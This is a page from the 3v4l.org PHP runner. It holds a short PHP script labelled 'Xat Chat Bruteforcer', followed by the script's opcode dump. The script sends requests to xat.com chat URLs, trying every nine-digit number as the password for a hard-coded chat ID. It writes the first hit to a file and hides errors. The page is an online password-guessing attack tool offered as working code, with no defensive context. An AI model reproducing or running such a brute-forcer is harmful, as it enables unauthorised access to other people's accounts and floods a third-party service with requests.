3v4l.org

run code in 300+ PHP versions simultaneously
<?php error_reporting(0); $file = "right.txt"; $chatID = "190959521"; echo "------------------------------\n"; echo "| Xat Chat Bruteforcer |\n"; echo "| Copyright 2011; |\n"; echo "| By bi0sph3re |\n"; echo "------------------------------\n"; for ($i=100000000;$i<999999999;$i++){ echo "http://xat.com/web_gear/chat.php?id=".$chatID."&pw=".$i."\n"; $url = file_get_contents("http://xat.com/web_gear/chat.php?id=".$chatID."&pw=".$i); if (strpos($url, $chatID)){ echo "Password Found!"; file_put_contents($file, "http://xat.com/web_gear/chat.php?id=".$chatID."&pw=".$i); exit(); }} ?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 39
Branch analysis from position: 39
2 jumps found. (Code = 44) Position 1 = 41, Position 2 = 12
Branch analysis from position: 41
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 12
2 jumps found. (Code = 43) Position 1 = 29, Position 2 = 38
Branch analysis from position: 29
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 38
2 jumps found. (Code = 44) Position 1 = 41, Position 2 = 12
Branch analysis from position: 41
Branch analysis from position: 12
filename:       /in/arCBc
function name:  (null)
number of ops:  42
compiled vars:  !0 = $file, !1 = $chatID, !2 = $i, !3 = $url
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   INIT_FCALL                                               'error_reporting'
          1        SEND_VAL                                                 0
          2        DO_ICALL                                                 
    3     3        ASSIGN                                                   !0, 'right.txt'
    4     4        ASSIGN                                                   !1, '190959521'
    5     5        ECHO                                                     '------------------------------%0A'
    6     6        ECHO                                                     '%7C+++++Xat+Chat+Bruteforcer+++%7C%0A'
    7     7        ECHO                                                     '%7C+++++++Copyright+2011%3B++++++%7C%0A'
    8     8        ECHO                                                     '%7C++++++++By+bi0sph3re++++++++%7C%0A'
    9     9        ECHO                                                     '------------------------------%0A'
   10    10        ASSIGN                                                   !2, 100000000
         11      > JMP                                                      ->39
   11    12    >   CONCAT                                           ~8      'http%3A%2F%2Fxat.com%2Fweb_gear%2Fchat.php%3Fid%3D', !1
         13        CONCAT                                           ~9      ~8, '%26pw%3D'
         14        CONCAT                                           ~10     ~9, !2
         15        CONCAT                                           ~11     ~10, '%0A'
         16        ECHO                                                     ~11
   12    17        INIT_FCALL                                               'file_get_contents'
         18        CONCAT                                           ~12     'http%3A%2F%2Fxat.com%2Fweb_gear%2Fchat.php%3Fid%3D', !1
         19        CONCAT                                           ~13     ~12, '%26pw%3D'
         20        CONCAT                                           ~14     ~13, !2
         21        SEND_VAL                                                 ~14
         22        DO_ICALL                                         $15     
         23        ASSIGN                                                   !3, $15
   13    24        INIT_FCALL                                               'strpos'
         25        SEND_VAR                                                 !3
         26        SEND_VAR                                                 !1
         27        DO_ICALL                                         $17     
         28      > JMPZ                                                     $17, ->38
   14    29    >   ECHO                                                     'Password+Found%21'
   15    30        INIT_FCALL                                               'file_put_contents'
         31        SEND_VAR                                                 !0
         32        CONCAT                                           ~18     'http%3A%2F%2Fxat.com%2Fweb_gear%2Fchat.php%3Fid%3D', !1
         33        CONCAT                                           ~19     ~18, '%26pw%3D'
         34        CONCAT                                           ~20     ~19, !2
         35        SEND_VAL                                                 ~20
         36        DO_ICALL                                                 
   16    37      > EXIT                                                     
   10    38    >   PRE_INC                                                  !2
         39    >   IS_SMALLER                                               !2, 999999999
         40      > JMPNZ                                                    ~23, ->12
   18    41    > > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


preferences:
152.93 ms | 1400 KiB | 21 Q